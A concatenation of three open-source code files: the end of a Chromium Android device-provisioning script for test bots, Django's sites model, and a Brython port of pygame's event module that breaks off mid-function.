  Thus, adb_keys file is rewritten so the device does not need to be
  re-authorized.

  Arguments:
    device: the device to wipe
    options: parsed command-line options (skip_wipe, adb_key_files).
  """
  if options.skip_wipe:
    return
  try:
    device.EnableRoot()
    # Remember whether this host was authorized so the keys can be restored
    # after 'wipe data' removes /data/misc/adb/.
    device_authorized = device.FileExists(constants.ADB_KEYS_FILE)
    if device_authorized:
      adb_keys = device.ReadFile(constants.ADB_KEYS_FILE,
                                 as_root=True).splitlines()
    device.RunShellCommand(['wipe', 'data'],
                           as_root=True, check_return=True)
    device.adb.WaitForDevice()

    if device_authorized:
      # Merge the device's previous keys with any extra host key files so
      # every listed host stays authorized after the wipe.
      adb_keys_set = set(adb_keys)
      for adb_key_file in options.adb_key_files or []:
        try:
          with open(adb_key_file, 'r') as f:
            adb_public_keys = f.readlines()
          adb_keys_set.update(adb_public_keys)
        except IOError:
          logging.warning('Unable to find adb keys file %s.', adb_key_file)
      _WriteAdbKeysFile(device, '\n'.join(adb_keys_set))
  except device_errors.CommandFailedError:
    # Best-effort: provisioning continues even if the wipe fails.
    logging.exception('Possible failure while wiping the device. '
                      'Attempting to continue.')
def _WriteAdbKeysFile(device, adb_keys_string):
  """Install the given adb public-key blob on the device.

  Creates the containing directory if needed and restores SELinux labels on
  both the directory and the file so adbd will accept them.
  """
  keys_dir = posixpath.dirname(constants.ADB_KEYS_FILE)
  for command in (['mkdir', '-p', keys_dir], ['restorecon', keys_dir]):
    device.RunShellCommand(command, as_root=True, check_return=True)
  device.WriteFile(constants.ADB_KEYS_FILE, adb_keys_string, as_root=True)
  device.RunShellCommand(['restorecon', constants.ADB_KEYS_FILE],
                         as_root=True, check_return=True)
def SetProperties(device, options):
  """Apply system properties and content settings required for testing.

  Enables root where possible, writes testing properties (non-user builds),
  applies deterministic content settings, toggles location / mock-location /
  network per `options`, relaxes the lockscreen, and optionally disables the
  system Chrome or removes the system WebView.
  """
  try:
    device.EnableRoot()
  except device_errors.CommandFailedError as e:
    # Root may be unavailable (e.g. user builds); continue with what we can.
    logging.warning(str(e))

  if not device.IsUserBuild():
    _ConfigureLocalProperties(device, options.enable_java_debug)
  else:
    logging.warning('Cannot configure properties in user builds.')
  device_settings.ConfigureContentSettings(
      device, device_settings.DETERMINISTIC_DEVICE_SETTINGS)
  if options.disable_location:
    device_settings.ConfigureContentSettings(
        device, device_settings.DISABLE_LOCATION_SETTINGS)
  else:
    device_settings.ConfigureContentSettings(
        device, device_settings.ENABLE_LOCATION_SETTINGS)

  if options.disable_mock_location:
    device_settings.ConfigureContentSettings(
        device, device_settings.DISABLE_MOCK_LOCATION_SETTINGS)
  else:
    device_settings.ConfigureContentSettings(
        device, device_settings.ENABLE_MOCK_LOCATION_SETTINGS)

  device_settings.SetLockScreenSettings(device)

  if options.disable_network:
    device_settings.ConfigureContentSettings(
        device, device_settings.NETWORK_DISABLED_SETTINGS)
    if device.build_version_sdk >= version_codes.MARSHMALLOW:
      # Ensure that NFC is also switched off.
      device.RunShellCommand(['svc', 'nfc', 'disable'],
                             as_root=True, check_return=True)

  if options.disable_system_chrome:
    # The system chrome version on the device interferes with some tests.
    device.RunShellCommand(['pm', 'disable', 'com.android.chrome'],
                           check_return=True)

  if options.remove_system_webview:
    if any(device.PathExists(p) for p in _SYSTEM_WEBVIEW_PATHS):
      logging.info('System WebView exists and needs to be removed')
      if device.HasRoot():
        # Disabled Marshmallow's Verity security feature
        if device.build_version_sdk >= version_codes.MARSHMALLOW:
          device.adb.DisableVerity()
          device.Reboot()
          device.WaitUntilFullyBooted()
          device.EnableRoot()
        # This is required, e.g., to replace the system webview on a device.
        device.adb.Remount()
        device.RunShellCommand(['stop'], check_return=True)
        device.RunShellCommand(['rm', '-rf'] + _SYSTEM_WEBVIEW_PATHS,
                               check_return=True)
        device.RunShellCommand(['start'], check_return=True)
      else:
        logging.warning('Cannot remove system webview from a non-rooted device')
    else:
      logging.info('System WebView already removed')

  # Some device types can momentarily disappear after setting properties.
  device.adb.WaitForDevice()
def _ConfigureLocalProperties(device, java_debug=True):
  """Set standard readonly testing device properties prior to reboot."""
  prop_lines = [
      'persist.sys.usb.config=adb',
      'ro.monkey=1',
      'ro.test_harness=1',
      'ro.audio.silent=1',
      'ro.setupwizard.mode=DISABLED',
  ]
  if java_debug:
    prop_lines += [
        '%s=all' % device_utils.DeviceUtils.JAVA_ASSERT_PROPERTY,
        'debug.checkjni=1',
    ]
  try:
    device.WriteFile(device.LOCAL_PROPERTIES_PATH,
                     '\n'.join(prop_lines), as_root=True)
    # Android will not respect the local props file if it is world writable.
    device.RunShellCommand(['chmod', '644', device.LOCAL_PROPERTIES_PATH],
                           as_root=True, check_return=True)
  except device_errors.CommandFailedError:
    logging.exception('Failed to configure local properties.')
def FinishProvisioning(device, options):
  """Final provisioning pass: unlock screen, manage battery, sync the clock.

  Arguments:
    device: the DeviceUtils instance being provisioned.
    options: parsed command-line options (min_battery_level,
        max_battery_temp, auto_reconnect, target).

  Raises:
    device_errors.CommandFailedError: if the date/time could not be set on a
        non-user build after retries.
  """
  # The lockscreen can't be disabled on user builds, so send a keyevent
  # to unlock it.
  if device.IsUserBuild():
    device.SendKeyEvent(keyevent.KEYCODE_MENU)

  if options.min_battery_level is not None:
    battery = battery_utils.BatteryUtils(device)
    try:
      battery.ChargeDeviceToLevel(options.min_battery_level)
    except device_errors.DeviceChargingError:
      # A reboot can recover a wedged charging state; retry once after it.
      device.Reboot()
      battery.ChargeDeviceToLevel(options.min_battery_level)

  if options.max_battery_temp is not None:
    try:
      battery = battery_utils.BatteryUtils(device)
      battery.LetBatteryCoolToTemperature(options.max_battery_temp)
    except device_errors.CommandFailedError:
      logging.exception('Unable to let battery cool to specified temperature.')

  def _set_and_verify_date():
    """Set the device clock from host GMT; True if skew ends up <= 1s."""
    if device.build_version_sdk >= version_codes.MARSHMALLOW:
      date_format = '%m%d%H%M%Y.%S'
      set_date_command = ['date', '-u']
      get_date_command = ['date', '-u']
    else:
      date_format = '%Y%m%d.%H%M%S'
      set_date_command = ['date', '-s']
      get_date_command = ['date']

    # TODO(jbudorick): This is wrong on pre-M devices -- get/set are
    # dealing in local time, but we're setting based on GMT.
    strgmtime = time.strftime(date_format, time.gmtime())
    set_date_command.append(strgmtime)
    device.RunShellCommand(set_date_command, as_root=True, check_return=True)

    get_date_command.append('+"%Y%m%d.%H%M%S"')
    device_time = device.RunShellCommand(
        get_date_command, as_root=True, single_line=True).replace('"', '')
    device_time = datetime.datetime.strptime(device_time, "%Y%m%d.%H%M%S")
    correct_time = datetime.datetime.strptime(strgmtime, date_format)
    # BUG FIX: previously `(correct_time - device_time).seconds`. For a
    # negative delta (device clock ahead of the host) .seconds is a large
    # positive value modulo one day, and any whole-day component was
    # silently dropped -- either could fabricate or mask a mismatch.
    tdelta = abs((correct_time - device_time).total_seconds())
    if tdelta <= 1:
      logging.info('Date/time successfully set on %s', device)
      return True
    else:
      logging.error('Date mismatch. Device: %s Correct: %s',
                    device_time.isoformat(), correct_time.isoformat())
      return False

  # Sometimes the date is not set correctly on the devices. Retry on failure.
  if device.IsUserBuild():
    # TODO(bpastene): Figure out how to set the date & time on user builds.
    pass
  else:
    if not timeout_retry.WaitFor(
        _set_and_verify_date, wait_period=1, max_tries=2):
      raise device_errors.CommandFailedError(
          'Failed to set date & time.', device_serial=str(device))

  # Dump all system properties for post-mortem debugging of the bot.
  props = device.RunShellCommand('getprop', check_return=True)
  for prop in props:
    logging.info(' %s', prop)

  if options.auto_reconnect:
    _PushAndLaunchAdbReboot(device, options.target)
def _UninstallIfMatch(device, pattern, app_to_keep):
  """Uninstall every package matching `pattern`, except `app_to_keep`.

  On user builds, system packages are skipped because they cannot be
  reinstalled without root.
  """
  package_lines = device.RunShellCommand(['pm', 'list', 'packages'])
  system_packages = [
      line.split(':')[1]
      for line in device.RunShellCommand(['pm', 'list', 'packages', '-s'])]
  for line in package_lines:
    package = line.split(':')[1]
    if not pattern.match(package) or package == app_to_keep:
      continue
    if not device.IsUserBuild() or package not in system_packages:
      device.Uninstall(package)
def _WipeUnderDirIfMatch(device, path, pattern):
  """Delete every entry directly under `path` whose name matches `pattern`."""
  for entry in device.ListDirectory(path):
    if pattern.match(entry):
      _WipeFileOrDir(device, posixpath.join(path, entry))
def _WipeFileOrDir(device, path):
  """Recursively remove `path` from the device if it exists."""
  if not device.PathExists(path):
    return
  device.RunShellCommand(['rm', '-rf', path], check_return=True)
def _PushAndLaunchAdbReboot(device, target):
  """Pushes and launches the adb_reboot binary on the device.

  Arguments:
    device: The DeviceUtils instance for the device to which the adb_reboot
        binary should be pushed.
    target: The build target (example, Debug or Release) which helps in
        locating the adb_reboot binary.
  """
  logging.info('Will push and launch adb_reboot on %s', str(device))
  # Stop any instance that is already running before replacing the binary.
  device.KillAll('adb_reboot', blocking=True, timeout=2, quiet=True)

  logging.info('  Pushing adb_reboot ...')
  host_binary = os.path.join(host_paths.DIR_SOURCE_ROOT,
                             'out/%s/adb_reboot' % target)
  device.PushChangedFiles([(host_binary, '/data/local/tmp/')])

  logging.info('  Launching adb_reboot ...')
  device.RunShellCommand(
      ['/data/local/tmp/adb_reboot'],
      check_return=True)
def _LaunchHostHeartbeat():
  """Restart the host_heartbeat helper, replacing any running instance."""
  KillHostHeartbeat()
  logging.info('Spawning host heartbeat...')
  heartbeat_script = os.path.join(host_paths.DIR_SOURCE_ROOT,
                                  'build/android/host_heartbeat.py')
  subprocess.Popen([heartbeat_script])
def KillHostHeartbeat():
  """Kill any running host_heartbeat processes on the host.

  Scans `ps aux` output for command lines mentioning host_heartbeat and
  sends each matching process a SIGTERM via `kill`.
  """
  ps = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE)
  stdout, _ = ps.communicate()
  matches = re.findall('\\n.*host_heartbeat.*', stdout)
  for match in matches:
    # BUG FIX: log message previously read 'host heart beart'.
    logging.info('An instance of host heartbeat running... will kill')
    # `ps aux` columns are USER PID ...; field index 1 is the PID.
    pid = re.findall(r'(\S+)', match)[1]
    subprocess.call(['kill', str(pid)])
def main():
  """Parse arguments and provision all selected devices.

  Returns the exit code from ProvisionDevices, or exit_codes.INFRA when no
  device is reachable (an infrastructure rather than a test failure).
  """
  # Recommended options on perf bots:
  # --disable-network
  #     TODO(tonyg): We eventually want network on. However, currently radios
  #     can cause perfbots to drain faster than they charge.
  # --min-battery-level 95
  #     Some perf bots run benchmarks with USB charging disabled which leads
  #     to gradual draining of the battery. We must wait for a full charge
  #     before starting a run in order to keep the devices online.

  parser = argparse.ArgumentParser(
      description='Provision Android devices with settings required for bots.')
  parser.add_argument('-d', '--device', metavar='SERIAL',
                      help='the serial number of the device to be provisioned'
                           ' (the default is to provision all devices attached)')
  parser.add_argument('--adb-path',
                      help='Absolute path to the adb binary to use.')
  parser.add_argument('--blacklist-file', help='Device blacklist JSON file.')
  parser.add_argument('--phase', action='append', choices=_PHASES.ALL,
                      dest='phases',
                      help='Phases of provisioning to run. '
                           '(If omitted, all phases will be run.)')
  parser.add_argument('--skip-wipe', action='store_true', default=False,
                      help="don't wipe device data during provisioning")
  parser.add_argument('--reboot-timeout', metavar='SECS', type=int,
                      help='when wiping the device, max number of seconds to'
                           ' wait after each reboot '
                           '(default: %s)' % _DEFAULT_TIMEOUTS.HELP_TEXT)
  parser.add_argument('--min-battery-level', type=int, metavar='NUM',
                      help='wait for the device to reach this minimum battery'
                           ' level before trying to continue')
  parser.add_argument('--disable-location', action='store_true',
                      help='disable Google location services on devices')
  parser.add_argument('--disable-mock-location', action='store_true',
                      default=False, help='Set ALLOW_MOCK_LOCATION to false')
  parser.add_argument('--disable-network', action='store_true',
                      help='disable network access on devices')
  parser.add_argument('--disable-java-debug', action='store_false',
                      dest='enable_java_debug', default=True,
                      help='disable Java property asserts and JNI checking')
  parser.add_argument('--disable-system-chrome', action='store_true',
                      help='Disable the system chrome from devices.')
  parser.add_argument('--remove-system-webview', action='store_true',
                      help='Remove the system webview from devices.')
  parser.add_argument('-t', '--target', default='Debug',
                      help='the build target (default: %(default)s)')
  parser.add_argument('-r', '--auto-reconnect', action='store_true',
                      help='push binary which will reboot the device on adb'
                           ' disconnections')
  parser.add_argument('--adb-key-files', type=str, nargs='+',
                      help='list of adb keys to push to device')
  parser.add_argument('-v', '--verbose', action='count', default=1,
                      help='Log more information.')
  parser.add_argument('--max-battery-temp', type=int, metavar='NUM',
                      help='Wait for the battery to have this temp or lower.')
  parser.add_argument('--output-device-blacklist',
                      help='Json file to output the device blacklist.')
  parser.add_argument('--chrome-specific-wipe', action='store_true',
                      help='only wipe chrome specific data during provisioning')
  parser.add_argument('--emulators', action='store_true',
                      help='provision only emulators and ignore usb devices')
  args = parser.parse_args()
  constants.SetBuildType(args.target)
  run_tests_helper.SetLogLevel(args.verbose)

  devil_chromium.Initialize(adb_path=args.adb_path)

  try:
    return ProvisionDevices(args)
  except (device_errors.DeviceUnreachableError, device_errors.NoDevicesError):
    # Classified as an infrastructure failure so the bot can tell it apart
    # from a genuine provisioning error.
    return exit_codes.INFRA
if __name__ == '__main__':
  # Propagate main()'s exit status to the shell.
  sys.exit(main())
| bsd-3-clause |
hunch/hunch-sample-app | django/contrib/sites/models.py | 12 | 2962 | from django.db import models
from django.utils.translation import ugettext_lazy as _
SITE_CACHE = {}
class SiteManager(models.Manager):
    def get_current(self):
        """
        Returns the current ``Site`` based on the SITE_ID in the
        project's settings. The ``Site`` object is cached the first
        time it's retrieved from the database.
        """
        from django.conf import settings
        try:
            sid = settings.SITE_ID
        except AttributeError:
            from django.core.exceptions import ImproperlyConfigured
            raise ImproperlyConfigured("You're using the Django \"sites framework\" without having set the SITE_ID setting. Create a site in your database and set the SITE_ID setting to fix this error.")
        # Hit the database only on a cache miss.
        if sid not in SITE_CACHE:
            SITE_CACHE[sid] = self.get(pk=sid)
        return SITE_CACHE[sid]

    def clear_cache(self):
        """Clears the ``Site`` object cache."""
        global SITE_CACHE
        SITE_CACHE = {}
class Site(models.Model):
    """A site served by this Django installation (domain plus display name)."""

    domain = models.CharField(_('domain name'), max_length=100)
    name = models.CharField(_('display name'), max_length=50)
    objects = SiteManager()

    class Meta:
        db_table = 'django_site'
        verbose_name = _('site')
        verbose_name_plural = _('sites')
        ordering = ('domain',)

    def __unicode__(self):
        return self.domain

    def save(self, *args, **kwargs):
        super(Site, self).save(*args, **kwargs)
        # Any cached copy of this site is stale now; drop it if present.
        SITE_CACHE.pop(self.id, None)

    def delete(self):
        pk = self.pk
        super(Site, self).delete()
        # Evict the deleted site from the cache, ignoring a miss.
        SITE_CACHE.pop(pk, None)
class RequestSite(object):
    """
    A class that shares the primary interface of Site (i.e., it has
    ``domain`` and ``name`` attributes) but gets its data from a Django
    HttpRequest object rather than from a database.

    The save() and delete() methods raise NotImplementedError.
    """
    def __init__(self, request):
        host = request.get_host()
        self.domain = host
        self.name = host

    def __unicode__(self):
        return self.domain

    def save(self, force_insert=False, force_update=False):
        raise NotImplementedError('RequestSite cannot be saved.')

    def delete(self):
        raise NotImplementedError('RequestSite cannot be deleted.')
def get_current_site(request):
    """
    Checks if contrib.sites is installed and returns either the current
    ``Site`` object or a ``RequestSite`` object based on the request.
    """
    if not Site._meta.installed:
        # sites framework not installed: fall back to a request-backed stub.
        return RequestSite(request)
    return Site.objects.get_current()
| mit |
40223137/w17w17 | static/Brython3.1.3-20150514-095342/Lib/site-packages/pygame/event.py | 603 | 19086 | #!/usr/bin/env python
'''Pygame module for interacting with events and queues.
Pygame handles all it's event messaging through an event queue. The routines
in this module help you manage that event queue. The input queue is heavily
dependent on the pygame display module. If the display has not been
initialized and a video mode not set, the event queue will not really work.
The queue is a regular queue of Event objects, there are a variety of ways
to access the events it contains. From simply checking for the existence of
events, to grabbing them directly off the stack.
All events have a type identifier. This event type is in between the values
of NOEVENT and NUMEVENTS. All user defined events can have the value of
USEREVENT or higher. It is recommended make sure your event id's follow this
system.
To get the state of various input devices, you can forego the event queue
and access the input devices directly with their appropriate modules; mouse,
key, and joystick. If you use this method, remember that pygame requires some
form of communication with the system window manager and other parts of the
platform. To keep pygame in synch with the system, you will need to call
pygame.event.pump() to keep everything current. You'll want to call this
function usually once per game loop.
The event queue offers some simple filtering. This can help performance
slightly by blocking certain event types from the queue, use the
pygame.event.set_allowed() and pygame.event.set_blocked() to work with
this filtering. All events default to allowed.
Joysticks will not send any events until the device has been initialized.
An Event object contains an event type and a readonly set of member data.
The Event object contains no method functions, just member data. Event
objects are retrieved from the pygame event queue. You can create your
own new events with the pygame.event.Event() function.
Your program must take steps to keep the event queue from overflowing. If the
program is not clearing or getting all events off the queue at regular
intervals, it can overflow. When the queue overflows an exception is thrown.
All Event objects contain an event type identifier in the Event.type member.
You may also get full access to the Event's member data through the Event.dict
method. All other member lookups will be passed through to the Event's
dictionary values.
While debugging and experimenting, you can print the Event objects for a
quick display of its type and members. Events that come from the system
will have a guaranteed set of member items based on the type. Here is a
list of the Event members that are defined with each type.
QUIT
(none)
ACTIVEEVENT
gain, state
KEYDOWN
unicode, key, mod
KEYUP
key, mod
MOUSEMOTION
pos, rel, buttons
MOUSEBUTTONUP
pos, button
MOUSEBUTTONDOWN
pos, button
JOYAXISMOTION
joy, axis, value
JOYBALLMOTION
joy, ball, rel
JOYHATMOTION
joy, hat, value
JOYBUTTONUP
joy, button
JOYBUTTONDOWN
joy, button
VIDEORESIZE
size, w, h
VIDEOEXPOSE
(none)
USEREVENT
code
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from copy import copy
#from ctypes import * #brython
from SDL import *
import pygame.base
import pygame.locals
import pygame.display
def pump():
    '''Internally process pygame event handlers.

    Call this roughly once per game loop if your program uses none of the
    other event-queue functions. It lets pygame interact with the window
    manager and the rest of the operating system; without regular calls the
    system may decide the program has locked up. Programs that already
    drain the queue via the other functions in this module do not need it.
    '''
    pygame.display._video_init_check()
    SDL_PumpEvents()
def get(typelist=None):
    '''Get events from the queue.

    pygame.event.get(): return Eventlist
    pygame.event.get(type): return Eventlist
    pygame.event.get(typelist): return Eventlist

    Removes and returns all queued events. When an event type (or sequence
    of types) is given, only matching events are removed and returned; any
    other events remain queued, so a selective consumer should take care
    that the queue does not fill up with types it never drains.

    :Parameters:
        `typelist` : int or sequence of int
            Event type or list of event types that can be returned.

    :rtype: list of `Event`
    '''
    pygame.display._video_init_check()

    if typelist is None:
        mask = SDL_ALLEVENTS
    elif hasattr(typelist, '__len__'):
        mask = 0
        for event_type in typelist:
            mask |= SDL_EVENTMASK(event_type)
    else:
        mask = int(typelist)

    SDL_PumpEvents()

    collected = []
    while True:
        batch = SDL_PeepEvents(1, SDL_GETEVENT, mask)
        if not batch:
            break
        collected.append(Event(0, sdl_event=batch[0]))
    return collected
def poll():
    '''Get a single event from the queue.

    Removes and returns one event. When the queue is empty, an event of
    type pygame.NOEVENT is returned immediately instead of blocking.

    :rtype: Event
    '''
    pygame.display._video_init_check()
    sdl_event = SDL_PollEventAndReturn()
    if not sdl_event:
        return Event(pygame.locals.NOEVENT)
    return Event(0, sdl_event=sdl_event, keep_userdata=True)
def wait():
    '''Wait for a single event from the queue.

    Blocks until an event arrives, then removes and returns it. While
    waiting the process sleeps in an idle state, which is friendly to
    other applications sharing the system.

    :rtype: Event
    '''
    pygame.display._video_init_check()
    return Event(0, sdl_event=SDL_WaitEventAndReturn())
def peek(typelist=None):
    '''Test if event types are waiting on the queue.

    Returns true if there are any events of the given type waiting on the
    queue. If a sequence of event types is passed, this will return True if
    any of those events are on the queue.

    :Parameters:
        `typelist` : int or sequence of int
            Event type or list of event types to look for.

    :rtype: bool
    '''
    pygame.display._video_init_check()
    if typelist is None:
        mask = SDL_ALLEVENTS
    else:
        if hasattr(typelist, '__len__'):
            mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
        else:
            # NOTE(review): the scalar case wraps the type in SDL_EVENTMASK
            # here, while get()/clear() pass int(typelist) straight through
            # as the mask -- confirm which form SDL_PeepEvents expects.
            mask = SDL_EVENTMASK(int(typelist))
    SDL_PumpEvents()
    # SDL_PEEKEVENT inspects events without removing them from the queue.
    events = SDL_PeepEvents(1, SDL_PEEKEVENT, mask)
    if typelist is None:
        # With no typelist the next Event (or a NOEVENT placeholder) is
        # returned instead of a bool; keep_userdata leaves posted events'
        # payloads intact since the event stays on the queue.
        if events:
            return Event(0, sdl_event=events[0], keep_userdata=True)
        else:
            return Event(pygame.locals.NOEVENT) # XXX deviation from pygame
    return len(events) > 0
def clear(typelist=None):
    '''Remove all events from the queue.

    Remove all events or events of a specific type from the queue. This has
    the same effect as `get` except nothing is returned. This can be
    slightly more efficient when clearing a full event queue.

    :Parameters:
        `typelist` : int or sequence of int
            Event type or list of event types to remove.
    '''
    pygame.display._video_init_check()
    if typelist is None:
        mask = SDL_ALLEVENTS
    else:
        if hasattr(typelist, '__len__'):
            mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
        else:
            mask = int(typelist)

    SDL_PumpEvents()

    # Drain matching events without wrapping them in Event objects (the
    # unused accumulator list the original kept here has been removed).
    new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
    while new_events:
        new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
# Mapping of SDL event ids to the CamelCase names reported by event_name().
# Ids in the user-event range are handled separately there.
_event_names = {
    SDL_ACTIVEEVENT:    'ActiveEvent',
    SDL_KEYDOWN:        'KeyDown',
    SDL_KEYUP:          'KeyUp',
    SDL_MOUSEMOTION:    'MouseMotion',
    SDL_MOUSEBUTTONDOWN:'MouseButtonDown',
    SDL_MOUSEBUTTONUP:  'MouseButtonUp',
    SDL_JOYAXISMOTION:  'JoyAxisMotion',
    SDL_JOYBALLMOTION:  'JoyBallMotion',
    SDL_JOYHATMOTION:   'JoyHatMotion',
    SDL_JOYBUTTONUP:    'JoyButtonUp',
    SDL_JOYBUTTONDOWN:  'JoyButtonDown',
    SDL_QUIT:           'Quit',
    SDL_SYSWMEVENT:     'SysWMEvent',
    SDL_VIDEORESIZE:    'VideoResize',
    SDL_VIDEOEXPOSE:    'VideoExpose',
    SDL_NOEVENT:        'NoEvent'
}
def event_name(event_type):
    '''Get the string name from an event id.

    Converts an integer event type into a CamelCase display name. Any id in
    the user-event range maps to 'UserEvent'; unrecognised ids map to
    'Unknown'.

    :Parameters:
        - `event_type`: int

    :rtype: str
    '''
    if SDL_USEREVENT <= event_type < SDL_NUMEVENTS:
        return 'UserEvent'
    return _event_names.get(event_type, 'Unknown')
def set_blocked(typelist):
    '''Control which events are allowed on the queue.

    Disallows the given event type(s) from appearing on the event queue.
    By default every type is allowed, and disabling a type more than once
    is harmless. Passing None blocks every event type.

    :note: events posted with `post` will not be blocked.

    :Parameters:
        `typelist` : int or sequence of int or None
            Event type or list of event types to disallow.
    '''
    pygame.display._video_init_check()
    if typelist is None:
        SDL_EventState(SDL_ALLEVENTS, SDL_IGNORE)
        return
    if not hasattr(typelist, '__len__'):
        typelist = (typelist,)
    for event_type in typelist:
        SDL_EventState(event_type, SDL_IGNORE)
def set_allowed(typelist):
    '''Control which events are allowed on the queue.

    Allows the given event type(s) to appear on the event queue. By default
    every type is already allowed, and enabling a type more than once is
    harmless. Passing None allows every event type.

    :Parameters:
        `typelist` : int or sequence of int or None
            Event type or list of event types to allow.
    '''
    pygame.display._video_init_check()
    if typelist is None:
        SDL_EventState(SDL_ALLEVENTS, SDL_ENABLE)
        return
    if not hasattr(typelist, '__len__'):
        typelist = (typelist,)
    for event_type in typelist:
        SDL_EventState(event_type, SDL_ENABLE)
def get_blocked(typelist):
    '''Test if a type of event is blocked from the queue.

    Returns true if the given event type is blocked from the queue.

    :Parameters:
        - `event_type`: int

    :rtype: int
    '''
    # NOTE(review): SDL_EventState(..., SDL_QUERY) reports SDL_ENABLE when
    # the event IS processed (i.e. not blocked), so comparing against
    # SDL_ENABLE looks inverted relative to the docstring. Confirm against
    # callers before changing the behavior.
    pygame.display._video_init_check()
    if typelist == None:
        return SDL_EventState(SDL_ALLEVENTS, SDL_QUERY) == SDL_ENABLE
    elif hasattr(typelist, '__len__'): # XXX undocumented behaviour
        # Sequence form: true if ANY listed type matches.
        for val in typelist:
            if SDL_EventState(val, SDL_QUERY) == SDL_ENABLE:
                return True
        return False
    else:
        return SDL_EventState(typelist, SDL_QUERY) == SDL_ENABLE
def set_grab(grab):
    '''Control the sharing of input devices with other applications.

    In a windowed environment the mouse and keyboard are normally shared
    with whichever application has focus. Setting the grab to True locks
    all input into this program. Avoid holding the grab permanently, since
    it prevents the user from doing anything else on their system.

    :Parameters:
        - `grab`: bool
    '''
    pygame.display._video_init_check()
    SDL_WM_GrabInput(SDL_GRAB_ON if grab else SDL_GRAB_OFF)
def get_grab():
    '''Test if the program is sharing input devices.

    Returns True while input events are grabbed for this application; use
    `set_grab` to change the state.

    :rtype: bool
    '''
    pygame.display._video_init_check()
    return SDL_WM_GrabInput(SDL_GRAB_QUERY) == SDL_GRAB_ON
# Magic markers written into SDL user events by post() so Event.__init__ can
# recognise an event that wraps a Python object; _user_event_objects maps the
# integer id carried in the event's data2 field to the posted Event instance.
_USEROBJECT_CHECK1 = int(0xdeadbeef)  # signed
_USEROBJECT_CHECK2 = 0xfeedf00d
_user_event_objects = {}
_user_event_nextid = 1
def post(event):
    '''Place a new event on the queue.

    This places a new event at the end of the event queue. These Events will
    later be retrieved from the other queue functions.

    This is usually used for placing pygame.USEREVENT events on the queue.
    Although any type of event can be placed, if using the sytem event types
    your program should be sure to create the standard attributes with
    appropriate values.

    :Parameters:
        `event` : Event
            Event to add to the queue.
    '''
    global _user_event_nextid

    pygame.display._video_init_check()

    sdl_event = SDL_Event(event.type)
    # Tag the SDL event with two magic numbers so Event.__init__ can tell it
    # apart from a genuine SDL user event; data2 carries the key into
    # _user_event_objects where the Python payload is stashed.
    sdl_event.user.code = _USEROBJECT_CHECK1
    sdl_event.user.data1 = c_void_p(_USEROBJECT_CHECK2)
    sdl_event.user.data2 = c_void_p(_user_event_nextid)
    _user_event_objects[_user_event_nextid] = event
    _user_event_nextid += 1

    SDL_PushEvent(sdl_event)
class Event:
    def __init__(self, event_type, event_dict=None, sdl_event=None,
                 keep_userdata=False, **attributes):
        '''Create a new event object.

        Creates a new event with the given type. The event is created with
        the given attributes and values. The attributes can come from a
        dictionary argument, or as string keys from a dictionary.

        The given attributes will be readonly attributes on the new event
        object itself. These are the only attributes on the Event object,
        there are no methods attached to Event objects.

        :Parameters:
            `event_type` : int
                Event type to create
            `event_dict` : dict
                Dictionary of attributes to assign.
            `sdl_event` : `SDL_Event`
                Construct a Pygame event from the given SDL_Event; used
                internally.
            `keep_userdata` : bool
                Used internally.
            `attributes` : additional keyword arguments
                Additional attributes to assign to the event.
        '''
        if sdl_event:
            # Reinterpret the raw event as a user event so the magic
            # markers written by post() can be checked.
            uevent = cast(pointer(sdl_event), POINTER(SDL_UserEvent)).contents
            if uevent.code == _USEROBJECT_CHECK1 and \
               uevent.data1 == _USEROBJECT_CHECK2 and \
               uevent.data2 in _user_event_objects:
                # An event that was posted; grab dict from local store.
                id = sdl_event.data2
                for key, value in _user_event_objects[id].__dict__.items():
                    setattr(self, key, value)
                # Free memory unless just peeking
                if not keep_userdata:
                    del _user_event_objects[id]
            else:
                # Standard SDL event: copy only the members relevant to the
                # event's type (see the module docstring for the full list).
                self.type = sdl_event.type
                if self.type == SDL_QUIT:
                    pass
                elif self.type == SDL_ACTIVEEVENT:
                    self.gain = sdl_event.gain
                    self.state = sdl_event.state
                elif self.type == SDL_KEYDOWN:
                    self.unicode = sdl_event.keysym.unicode
                    self.key = sdl_event.keysym.sym
                    self.mod = sdl_event.keysym.mod
                elif self.type == SDL_KEYUP:
                    self.key = sdl_event.keysym.sym
                    self.mod = sdl_event.keysym.mod
                elif self.type == SDL_MOUSEMOTION:
                    self.pos = (sdl_event.x, sdl_event.y)
                    self.rel = (sdl_event.xrel, sdl_event.yrel)
                    self.buttons = (sdl_event.state & SDL_BUTTON(1) != 0,
                                    sdl_event.state & SDL_BUTTON(2) != 0,
                                    sdl_event.state & SDL_BUTTON(3) != 0)
                elif self.type in (SDL_MOUSEBUTTONDOWN, SDL_MOUSEBUTTONUP):
                    self.pos = (sdl_event.x, sdl_event.y)
                    self.button = sdl_event.button
                elif self.type == SDL_JOYAXISMOTION:
                    self.joy = sdl_event.which
                    self.axis = sdl_event.axis
                    # Normalise the raw signed 16-bit value into [-1.0, 1.0].
                    self.value = sdl_event.value / 32767.0
                elif self.type == SDL_JOYBALLMOTION:
                    self.joy = sdl_event.which
                    self.ball = sdl_event.ball
                    self.rel = (sdl_event.xrel, sdl_event.yrel)
                elif self.type == SDL_JOYHATMOTION:
                    self.joy = sdl_event.which
                    self.hat = sdl_event.hat
                    # Decode the hat bitmask into an (x, y) direction pair.
                    hx = hy = 0
                    if sdl_event.value & SDL_HAT_UP:
                        hy = 1
                    if sdl_event.value & SDL_HAT_DOWN:
                        hy = -1
                    if sdl_event.value & SDL_HAT_RIGHT:
                        hx = 1
                    if sdl_event.value & SDL_HAT_LEFT:
                        hx = -1
                    self.value = (hx, hy)
                elif self.type in (SDL_JOYBUTTONUP, SDL_JOYBUTTONDOWN):
                    self.joy = sdl_event.which
                    self.button = sdl_event.button
                elif self.type == SDL_VIDEORESIZE:
                    self.size = (sdl_event.w, sdl_event.h)
                    self.w = sdl_event.w
                    self.h = sdl_event.h
                elif self.type == SDL_VIDEOEXPOSE:
                    pass
                elif self.type == SDL_SYSWMEVENT:
                    pass ### XXX: not implemented
                elif self.type >= SDL_USEREVENT and self.type < SDL_NUMEVENTS:
                    self.code = sdl_event.code
        else:
            # Create an event (not from event queue)
            self.type = event_type
            if event_dict:
